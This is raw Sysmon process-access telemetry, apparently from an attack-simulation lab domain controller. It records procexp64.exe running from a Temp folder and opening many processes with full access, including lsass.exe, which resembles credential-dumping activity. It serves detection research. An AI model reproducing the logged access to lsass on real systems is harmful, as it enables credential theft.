15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786461Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786460Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786459Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786458Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786457Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786456Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786455Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786454Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786453Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786452Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786451Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786450Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786449Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786448Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786447Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786446Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786445Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786444Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786443Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786442Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786441Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786440Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786439Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786438Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786437Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786436Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786435Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786434Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786433Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786432Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786431Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786430Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786429Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786428Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786427Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786426Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786425Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:04.549{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786424Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 